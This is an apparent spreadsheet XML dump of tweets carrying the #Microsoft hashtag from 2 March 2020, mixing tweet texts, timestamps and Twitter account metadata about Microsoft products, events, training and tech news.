'https://pbs.twimg.com/profile_banners/1070751681800007685/1569074515',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</si>
  <si>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16:05:28 +0000 2020</t>
  </si>
  <si>
    <t>Announcing the Terraform AzureRM 2.0 Provider release https://t.co/awjXAUsKZO #Microsoft #Azure</t>
  </si>
  <si>
    <t>Mon Mar 02 16:05:16 +0000 2020</t>
  </si>
  <si>
    <t>Deleting a #Windows 10 Always On #VPN device tunnel. #Microsoft #Windows10 #Win10 #aovpn #mobility https://t.co/uphjs753jn</t>
  </si>
  <si>
    <t>Mon Mar 02 16:05:13 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Empower your healthcare IT Team so theyre ready for the future: " https://t.co/SmztO6I28L
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Mon Mar 02 16:04:30 +0000 2020</t>
  </si>
  <si>
    <t>Missed any of the weekends big stories?
Here is a selection of top #CyberSecurity stories:
https://t.co/zOWp9WX537
Thanks @happygeek @swissinfo_en @zackwhittaker @KateOflaherty
#MondayMorning #Windows10 #InfoSec #Microsoft #DataBreach #Visser #Tesla #ClearviewAI #TechNews https://t.co/86mJO5TKZl</t>
  </si>
  <si>
    <t>Mon Mar 02 16:04:04 +0000 2020</t>
  </si>
  <si>
    <t>Find out how Garland Prisms works with #Microsoft #Azure in the native #cloud environment to provide packet-level visibility. 
https://t.co/iMNrvLAhyf</t>
  </si>
  <si>
    <t>{'id': 1128813198, 'id_str': '1128813198', 'name': 'Garland Technology', 'screen_name': 'GarlandTech', 'location': 'NY | TX | UK | AU | CZ', 'description': 'Industryâ€™s most reliable test access point (TAP), network packet brokers (NPB), and cloud visibility solutions. See every bit, byte, and packetÂ®', 'url': 'http://t.co/EIeyKL9uN6', 'entities': {'url': {'urls': [{'url': 'http://t.co/EIeyKL9uN6', 'expanded_url': 'http://www.garlandtechnology.com', 'display_url': 'garlandtechnology.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3619, 'friends_count': 3102, 'listed_count': 220, 'created_at': 'Mon Jan 28 18:16:24 +0000 2013', 'favourites_count': 2321, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11912,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'http://pbs.twimg.com/profile_images/835245232811827200/2h0L7bFg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/835245232811827200/2h0L7bFg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1128813198/1579713419', 'profile_link_color': '34A617',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</si>
  <si>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16:01:52 +0000 2020</t>
  </si>
  <si>
    <t>And there are options for #MSTeams tags in the admin center. Enabling a team member, suggesting default tags. Very cool ....and another thing to think about when working on #governance. #O365 #microsoft https://t.co/CbqE9VtxTX</t>
  </si>
  <si>
    <t>Mon Mar 02 16:01:22 +0000 2020</t>
  </si>
  <si>
    <t>One 30 minutes call might be all you need to get an answer to your Power Automate burning question or solve your burning issues.
https://t.co/NYdy8oaH7C
#powerautomate #expertcall #microsoft #microjobs #collab365 #futureofwork</t>
  </si>
  <si>
    <t>{'id': 1707711044, 'id_str': '1707711044', 'name': 'Collab365 Community', 'screen_name': 'collab365', 'location': '', 'description': 'We run a large community site based around the Office 365 family, (inc SharePoint) and Azure.', 'url': 'https://t.co/vEzYjTKF5l', 'entities': {'url': {'urls': [{'url': 'https://t.co/vEzYjTKF5l', 'expanded_url': 'https://collab365.community/', 'display_url': 'collab365.community', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1782, 'friends_count': 205, 'listed_count': 19, 'created_at': 'Wed Aug 28 16:26:51 +0000 2013', 'favourites_count': 294, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 559,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'http://pbs.twimg.com/profile_images/855020614976888832/zcf_XY55_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/855020614976888832/zcf_XY55_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1707711044/1562517291', 'profile_link_color': '000000',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</si>
  <si>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Mon Mar 02 16:01:02 +0000 2020</t>
  </si>
  <si>
    <t>We are one month away from our first annual #TTNE! Join us for a lively and informative day filled with sessions from #Teams professionals, MVPs, #Microsoft employees, and more. Dont miss your chance to register for this free event: https://t.co/Hm7TOmvYVJ https://t.co/fH0YubWrPZ</t>
  </si>
  <si>
    <t>{'id': 1199831607332478976, 'id_str': '1199831607332478976', 'name': 'Teams Thursday New England', 'screen_name': 'TeamsThursdayNE', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 43, 'friends_count': 5, 'listed_count': 0, 'created_at': 'Wed Nov 27 23:27:35 +0000 2019', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 69, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1206731153312550913/D2mOi5dx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206731153312550913/D2mOi5dx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1199831607332478976/1574900689',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</si>
  <si>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16:00:36 +0000 2020</t>
  </si>
  <si>
    <t>Is nobody using your #SharePoint intranet in your organisation? That's a shame - check out our helpful blog post: https://t.co/kEqMO0OukJ  
#intranet #onpremises #sharepointonprem #microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 16:00:03 +0000 2020</t>
  </si>
  <si>
    <t>"We need to have diversity in more management and leadership positions because diversity attracts diversity."  #IWD2020.  #WomenTechMakers  #stem #microsoft #WomenInSTEM #WomenInScience #100daysofcode #girlswhocode https://t.co/653zkptJf9</t>
  </si>
  <si>
    <t>Mon Mar 02 16:00:02 +0000 2020</t>
  </si>
  <si>
    <t>We all deserve the cleanest air possible. Read how #AI could help plan the healthiest route through your city. #digitaltransfomation #mobility #smartcity #Microsoft #AIforEarth https://t.co/ydnZxDDjbb</t>
  </si>
  <si>
    <t>Mon Mar 02 16:00:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Cortana Ends Music and Smart Home Support as Enterprise Shift Continues - Voicebot https://t.co/mA6zgK5RMD</t>
  </si>
  <si>
    <t>{'id': 774200021298315264, 'id_str': '774200021298315264', 'name': 'voicebot.ai', 'screen_name': 'voicebotai', 'location': '', 'description': 'Giving Voice to a Revolution', 'url': 'https://t.co/7JeyE4uvQY', 'entities': {'url': {'urls': [{'url': 'https://t.co/7JeyE4uvQY', 'expanded_url': 'http://voicebot.ai/', 'display_url': 'voicebot.ai', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4406, 'friends_count': 430, 'listed_count': 142, 'created_at': 'Fri Sep 09 10:57:23 +0000 2016', 'favourites_count': 3153, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3273, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1178735843101548544/fIR8ce-G_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1178735843101548544/fIR8ce-G_normal.jpg',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</si>
  <si>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15:59:06 +0000 2020</t>
  </si>
  <si>
    <t>You are using #Windows10 wrong!  Help is here. 
https://t.co/WKAJuTgOJA
#MIEExpert 
#OneDrive
#sync
#Microsoft
#Microsoft365
#MicrosoftOffice</t>
  </si>
  <si>
    <t>Mon Mar 02 15:58:34 +0000 2020</t>
  </si>
  <si>
    <t>Trying to make a bootable  usb stick for #Windows10 and its difficult because it needs to have a #GPT partition if your #bios is #uefi.
#Microsoft why make things so hard...</t>
  </si>
  <si>
    <t>{'id': 3780310474, 'id_str': '3780310474', 'name': 'Gary Slatter', 'screen_name': 'garyslatter45', 'location': 'kings.stanley, England', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 543, 'friends_count': 224, 'listed_count': 6, 'created_at': 'Sat Sep 26 08:55:32 +0000 2015', 'favourites_count': 59906, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 17128,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'http://pbs.twimg.com/profile_images/647696382363627521/TqLRZ3oN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/647696382363627521/TqLRZ3oN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3780310474/1498467598',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</si>
  <si>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15:56:09 +0000 2020</t>
  </si>
  <si>
    <t>I just noticed that #MSTeams Owners can now easily create @mentions tags. More ways to get people's attention ! I love how #Microsoft is continually trying to make my life easier . I so needed this, because it's getting harder for me to find content. There. I said it.  #O365 https://t.co/avwXXfyurC</t>
  </si>
  <si>
    <t>Mon Mar 02 15:54:02 +0000 2020</t>
  </si>
  <si>
    <t>Want to Migrate to #SharePoint online using only #Microsoft tools? Check out my  @Pluralsight course to learn how! | https://t.co/ud02myCjSY https://t.co/Y5kKEtIJa5</t>
  </si>
  <si>
    <t>{'id': 859754934, 'id_str': '859754934', 'name': 'Vlad Catrinescu', 'screen_name': 'vladcatrinescu', 'location': 'Montreal,Canada', 'description': '#SharePoint &amp; Office 365 MVP International Speaker and author @Pluralsight  &amp; @Apress  . Working as a Product Evangelist for  award winning @valointranet .', 'url': 'https://t.co/JJjbwLNrHH', 'entities': {'url': {'urls': [{'url': 'https://t.co/JJjbwLNrHH', 'expanded_url': 'https://VladTalksTech.com', 'display_url': 'VladTalksTech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8677, 'friends_count': 740, 'listed_count': 404, 'created_at': 'Wed Oct 03 14:15:53 +0000 2012', 'favourites_count': 5577, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 54001,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'http://pbs.twimg.com/profile_images/646896958511013888/__uOCEjt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/646896958511013888/__uOCEjt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/859754934/1415765195', 'profile_link_color': '2FC2EF',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</si>
  <si>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15:53:49 +0000 2020</t>
  </si>
  <si>
    <t>ICYMI: Blog: License requirements for administering Microsoft 365 services #AzureAD #Security #Licensing #Intune #EXO #Microsoft365 #ModernWorkplace #Microsoft #Office365 #insight24_nl #wmug_nl
https://t.co/VcNEeQlgzK</t>
  </si>
  <si>
    <t>{'id': 10093202, 'id_str': '10093202', 'name': 'Kenneth van Surksum', 'screen_name': 'kennethvs', 'location': 'Amersfoort, the Netherlands', 'description': 'Managing Consultant at Insight24 #WMUG_NL board member', 'url': 'https://t.co/eZUxtpkzgC', 'entities': {'url': {'urls': [{'url': 'https://t.co/eZUxtpkzgC', 'expanded_url': 'http://www.vansurksum.com', 'display_url': 'vansurksum.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4432, 'friends_count': 3190, 'listed_count': 320, 'created_at': 'Fri Nov 09 09:25:49 +0000 2007', 'favourites_count': 1348, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8246,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'http://pbs.twimg.com/profile_images/658366329959813120/fXbQ0vSf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/658366329959813120/fXbQ0vSf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/10093202/1485034525',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</si>
  <si>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Mon Mar 02 15:52:17 +0000 2020</t>
  </si>
  <si>
    <t>Will you Buy Made in China?
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/28ZSHKhuSS</t>
  </si>
  <si>
    <t>Mon Mar 02 15:51:21 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft
#FlipgridFever
Fligrid is a digital tool for all the educators and presenters! It's Free! Part of Microsoft.You will it, let try it!Sign up NOW!
Follow the link as below:
https://t.co/LKRcOGsiiv
How to use Fligrid! A guide for educators. 
https://t.co/nVhgHVV3PC https://t.co/0YM6YbGeWg</t>
  </si>
  <si>
    <t>{'id': 148798282, 'id_str': '148798282', 'name': 'cheng', 'screen_name': 'sumikoccy', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 176, 'friends_count': 880, 'listed_count': 2, 'created_at': 'Thu May 27 16:41:46 +0000 2010', 'favourites_count': 248, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 151,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'http://pbs.twimg.com/profile_images/1123789913470713857/dpEGov3B_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1123789913470713857/dpEGov3B_normal.png',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</si>
  <si>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15:50:08 +0000 2020</t>
  </si>
  <si>
    <t>Writing a job description takes valuable time, but we're here to help! 
Just tell us what you need and our expert consultants will do the rest  https://t.co/Cin0zxkayb
#Microsoft #Azure #Dynamics365 https://t.co/fstcIFxEaR</t>
  </si>
  <si>
    <t>Mon Mar 02 15:50:05 +0000 2020</t>
  </si>
  <si>
    <t>We have four spots left in our Intro #PowerPoint class this Tuesday and Thursday morning. Join us, and bring pizzazz to your presentations! Learn more or register at https://t.co/D3BnzrZ5gG
#microsoft #techtraining #continuingeducation #morriscountynj https://t.co/sSvtt8adUq</t>
  </si>
  <si>
    <t>{'id': 1048251258992283648, 'id_str': '1048251258992283648', 'name': 'Workforce Development, County College of Morris', 'screen_name': 'WFD_CCM', 'location': 'Randolph, NJ', 'description': "We offer training that boosts resumes - get a job, get a better job, or get better at the job you're in with courses, and earn industry recognized credentials.", 'url': 'https://t.co/fXLUE2A8mg', 'entities': {'url': {'urls': [{'url': 'https://t.co/fXLUE2A8mg', 'expanded_url': 'http://www.ccm.edu/workforce', 'display_url': 'ccm.edu/workforce', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 80, 'friends_count': 128, 'listed_count': 0, 'created_at': 'Fri Oct 05 16:39:10 +0000 2018', 'favourites_count': 220, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 207,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'http://pbs.twimg.com/profile_images/1133462414652055552/3zPJK-3I_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1133462414652055552/3zPJK-3I_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1048251258992283648/1540317715',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</si>
  <si>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15:49:36 +0000 2020</t>
  </si>
  <si>
    <t>Oh snap ......Madiiiioooo #gamer #gaming #nerd #geek #streamer #streaming #twitch #ps4 #ps4pro #pcgamer #xboxone #microsoft #sony #playstation #nintendo #switch #mario #luigismansion3 #comedy #funny https://t.co/5AOuanDcPf</t>
  </si>
  <si>
    <t>{'id': 915533833, 'id_str': '915533833', 'name': 'ðŸ—¡innerBLACKninjaðŸ—¡', 'screen_name': 'innerBLACKninja', 'location': 'Milwaukee WI', 'description': "FLYER THEN KID ICARUS..... Super Nintendo, Sega Genesis / When I was dead broke, man I couldn't picture this... innerBLACKninja", 'url': 'https://t.co/xmiBn0BL7F', 'entities': {'url': {'urls': [{'url': 'https://t.co/xmiBn0BL7F', 'expanded_url': 'https://twitch.tv/innerBLACKninja', 'display_url': 'twitch.tv/innerBLACKninja', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 287, 'friends_count': 580, 'listed_count': 4, 'created_at': 'Tue Oct 30 21:22:00 +0000 2012', 'favourites_count': 4280, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7125,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'http://pbs.twimg.com/profile_images/1033849996905521152/R32N2gF__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1033849996905521152/R32N2gF__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/915533833/1493521067',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</si>
  <si>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15:49:05 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus: #Microsoft exits developer event and revises outlook. Microsoft has decided to run a digital-only event after announcing it would not be at the #GamesDeveloper Conference in #SanFrancisco. Read more: https://t.co/mHK7PmS2Uv https://t.co/KsdmL28Rrk</t>
  </si>
  <si>
    <t>{'id': 917439686934589440, 'id_str': '917439686934589440', 'name': 'SCS', 'screen_name': 'swcontractsol', 'location': 'Sacramento, CA', 'description': '', 'url': 'https://t.co/0HTOUFCuvr', 'entities': {'url': {'urls': [{'url': 'https://t.co/0HTOUFCuvr', 'expanded_url': 'http://softwarecontractsolutions.com', 'display_url': 'softwarecontractsolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 1, 'listed_count': 2, 'created_at': 'Mon Oct 09 17:20:41 +0000 2017', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 357, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/933015496974204928/2xxYaicm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/933015496974204928/2xxYaicm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/917439686934589440/1511283322',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</si>
  <si>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15:47:25 +0000 2020</t>
  </si>
  <si>
    <t>Rumor is just a prophecy far ahead of our times.
But Xi Lied.
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/nSEwknCpbl</t>
  </si>
  <si>
    <t>Mon Mar 02 15:47:24 +0000 2020</t>
  </si>
  <si>
    <t>If you'd like to learn more about what we can do for you, please visit our website or our partners website for more details!
CFM: https://t.co/q3Jj1IwFRT  
inTec: https://t.co/u2LJmP21TJ
#MicrosoftMonday #Microsoft #MicrosoftTeams #Microsoft365 #Teams #MondayMotivation https://t.co/tvYS77ogZL</t>
  </si>
  <si>
    <t>{'id': 740149300735414273, 'id_str': '740149300735414273', 'name': 'CFM (Cloud Facilities Management)', 'screen_name': 'cfmhub', 'location': 'Manchester, England', 'description': 'SaaS, Naas, DaaS. Cloud technology protecting your people, assets &amp; facilities.', 'url': 'https://t.co/YCQ0wdCvLu', 'entities': {'url': {'urls': [{'url': 'https://t.co/YCQ0wdCvLu', 'expanded_url': 'http://www.cfmhub.co.uk', 'display_url': 'cfmhub.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 226, 'friends_count': 380, 'listed_count': 7, 'created_at': 'Tue Jun 07 11:51:59 +0000 2016', 'favourites_count': 250, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 841,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'http://pbs.twimg.com/profile_images/1222899352479252484/kj1It2Dz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222899352479252484/kj1It2Dz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/740149300735414273/1527003495', 'profile_link_color': '1DA2F1',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</si>
  <si>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15:47:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft suggests that #HALO: COMBAT EVOLVED ANNIVERSARY on #PC will get an official release date this week... https://t.co/4YID9hQa1a https://t.co/2FXb5ld6WI</t>
  </si>
  <si>
    <t>Mon Mar 02 15:44:38 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Planning a #Microsoft exam for the end of the year but not sure which one yet...
 MS-101 Mobility &amp;amp; Security (to complete my last leg!)
MS-500 #Security Admin
 MS-700 #MicrosoftTeams
PL-900 #PowerPlatform Fundamentals (new to me)
</t>
  </si>
  <si>
    <t>{'id': 1628208582, 'id_str': '1628208582', 'name': 'Veronique Lengelle', 'screen_name': 'veronicageek', 'location': 'UK', 'description': "Microsoft MVP | #SharePoint #Office365 #PowerShell @ScotSPO365UG. French in Scotland &amp; lovin' it! ðŸŽ¥https://t.co/tOL27CHVyy - ðŸ“https://t.co/mfTYSuwi3a", 'url': 'https://t.co/5I6iqrsEuw', 'entities': {'url': {'urls': [{'url': 'https://t.co/5I6iqrsEuw', 'expanded_url': 'http://bit.ly/2H7KfFx', 'display_url': 'bit.ly/2H7KfFx', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/tOL27CHVyy', 'expanded_url': 'http://bit.ly/2httExM', 'display_url': 'bit.ly/2httExM', 'indices': [99, 122]}, {'url': 'https://t.co/mfTYSuwi3a', 'expanded_url': 'http://bit.ly/2AGRQ7D', 'display_url': 'bit.ly/2AGRQ7D', 'indices': [126, 149]}]}}, 'protected': False, 'followers_count': 1506, 'friends_count': 509, 'listed_count': 42, 'created_at': 'Sun Jul 28 16:26:39 +0000 2013', 'favourites_count': 4260, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2818,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'http://pbs.twimg.com/profile_images/1175373590717448192/D5Q0oiAo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1175373590717448192/D5Q0oiAo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1628208582/1542107049',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</si>
  <si>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15:43:41 +0000 2020</t>
  </si>
  <si>
    <t>#China lockdowns and quarantines has separated families and left many isolated.
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #XiJinping
https://t.co/1JiYj3FFfb</t>
  </si>
  <si>
    <t>Mon Mar 02 15:43:40 +0000 2020</t>
  </si>
  <si>
    <t>companies should rethink their EUC solution and use it broader or redesign and make their employee work from home. #coronavirus
#citrix #vmware #microsoft #parallels #teradici</t>
  </si>
  <si>
    <t>{'id': 211561365, 'id_str': '211561365', 'name': 'Thomas Poppelgaard', 'screen_name': '_POPPELGAARD', 'location': 'Denmark', 'description': 'Independent Consultant. SME EUC,Remote Graphics,AR,MR,VR. Awarded Citrix (CTP), Microsoft (MVP),NVIDIA (NGCA), Parallels (VIPP),VMware (vExpert) DKCUGC leader', 'url': 'https://t.co/Nb8JdjXo9R', 'entities': {'url': {'urls': [{'url': 'https://t.co/Nb8JdjXo9R', 'expanded_url': 'http://www.poppelgaard.com', 'display_url': 'poppelgaard.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3857, 'friends_count': 1092, 'listed_count': 254, 'created_at': 'Wed Nov 03 16:18:05 +0000 2010', 'favourites_count': 11289, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15014,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'http://pbs.twimg.com/profile_images/1231344623961899011/iviK08e7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231344623961899011/iviK08e7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/211561365/1578395484',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</si>
  <si>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15:43:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Edge lets Facebook run Flash code behind users' backs #flash #facebook #edge #microsoft #code https://t.co/6RI0a98Uo3</t>
  </si>
  <si>
    <t>{'id': 14801430, 'id_str': '14801430', 'name': 'HsiangHui', 'screen_name': 'hsianghui', 'location': 'Singapore', 'description': 'Lecturer, PhD, Mobile App Developer (https://t.co/yM7B402ObE) Interested in Analytics, Marketing, Coding, Entrepreneurship, EdTech, NLP', 'url': 'https://t.co/sjAH1RXdMY', 'entities': {'url': {'urls': [{'url': 'https://t.co/sjAH1RXdMY', 'expanded_url': 'https://www.linkedin.com/in/hsianghui/', 'display_url': 'linkedin.com/in/hsianghui/', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/yM7B402ObE', 'expanded_url': 'http://www.blackfacility.com', 'display_url': 'blackfacility.com', 'indices': [37, 60]}]}}, 'protected': False, 'followers_count': 5200, 'friends_count': 3160, 'listed_count': 117, 'created_at': 'Fri May 16 17:21:53 +0000 2008', 'favourites_count': 63400, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 39064,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'http://pbs.twimg.com/profile_images/738922680770924546/BTnuu81o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/738922680770924546/BTnuu81o_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14801430/1469361432',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</si>
  <si>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15:42:47 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "US Drugstore Giant Walgreens Leaked Users' Sensitive Info:" https://t.co/wCWhy1rcvE
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Mon Mar 02 15:41:10 +0000 2020</t>
  </si>
  <si>
    <t>#XiJinping has Exported the Coronavirus.
But Coronavirus is still Made in #China.
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford 
https://t.co/sKuGKB3jej</t>
  </si>
  <si>
    <t>Mon Mar 02 15:40:05 +0000 2020</t>
  </si>
  <si>
    <t>What happened to Rare?
#rare #perfectdark #nintendo #microsoft #gaming #smallstreamer https://t.co/y2GBqjKe84</t>
  </si>
  <si>
    <t>{'id': 764961023669460992, 'id_str': '764961023669460992', 'name': 'ZcriptureZ', 'screen_name': 'ZcriptureZ', 'location': 'Florida, USA', 'description': "Creation is everything. I'm a YouTuber, and streamer. My current game addictions are #guildwars2 and #deathstranding", 'url': 'https://t.co/9lKufJETSS', 'entities': {'url': {'urls': [{'url': 'https://t.co/9lKufJETSS', 'expanded_url': 'https://www.youtube.com/user/ZcriptureZ', 'display_url': 'youtube.com/user/ZcriptureZ', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 72, 'friends_count': 65, 'listed_count': 8, 'created_at': 'Sun Aug 14 23:04:55 +0000 2016', 'favourites_count': 1101, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1511,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'http://pbs.twimg.com/profile_images/794891501721489409/LA2nSeA4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/794891501721489409/LA2nSeA4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/764961023669460992/1471458740', 'profile_link_color': '990000',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</si>
  <si>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15:39:59 +0000 2020</t>
  </si>
  <si>
    <t>KiZAN Customer Success Stories:  Teachers Credit Union
View Story: https://t.co/Hlh4VFkZZL
#microsoft #cloud #cx</t>
  </si>
  <si>
    <t>{'id': 234789768, 'id_str': '234789768', 'name': 'KiZAN Technologies', 'screen_name': 'kizantech', 'location': '', 'description': 'We help provide solutions to complex business problems. #Microsoft Cloud Solutions Provider &amp; Gold Certified Partner in 15 competencies.', 'url': 'https://t.co/DAUUyGuZPf', 'entities': {'url': {'urls': [{'url': 'https://t.co/DAUUyGuZPf', 'expanded_url': 'https://www.kizan.com/', 'display_url': 'kizan.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1139, 'friends_count': 2629, 'listed_count': 244, 'created_at': 'Thu Jan 06 15:37:54 +0000 2011', 'favourites_count': 489, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5068,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'http://pbs.twimg.com/profile_images/1160952441673781248/MZeeysMh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1160952441673781248/MZeeysMh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/234789768/1581444997', 'profile_link_color': '105187',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</si>
  <si>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15:38:45 +0000 2020</t>
  </si>
  <si>
    <t>If youre working towards a MCSA, MCSD, or MCSE certification, youll want to pass all required exams before they retire on June 30, 2020. #sqlserver #microsoft 
https://t.co/pm2rhRCk8W</t>
  </si>
  <si>
    <t>{'id': 147967936, 'id_str': '147967936', 'name': 'Eric Cobb', 'screen_name': 'cfgears', 'location': 'Spring Hill, TN (Nashville)', 'description': "IDERA ACE 2020 | MCSE: Data Platform | MCSE: Data Management and Analytics\n'My work is a game, a very serious game.' - M. C. Escher", 'url': 'http://t.co/v66QLPb8BH', 'entities': {'url': {'urls': [{'url': 'http://t.co/v66QLPb8BH', 'expanded_url': 'http://www.sqlnuggets.com', 'display_url': 'sqlnuggets.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 262, 'friends_count': 234, 'listed_count': 32, 'created_at': 'Tue May 25 14:08:08 +0000 2010', 'favourites_count': 188, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1815,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'http://pbs.twimg.com/profile_images/1221486394/South_Park_Icon2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1221486394/South_Park_Icon2_normal.jpg',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</si>
  <si>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15:38:38 +0000 2020</t>
  </si>
  <si>
    <t>I have one old fantasy... but I havent told anyone about it yet... Do you want to try it? #Santa Rosa   #microsoft #water https://t.co/fe51xGii5R</t>
  </si>
  <si>
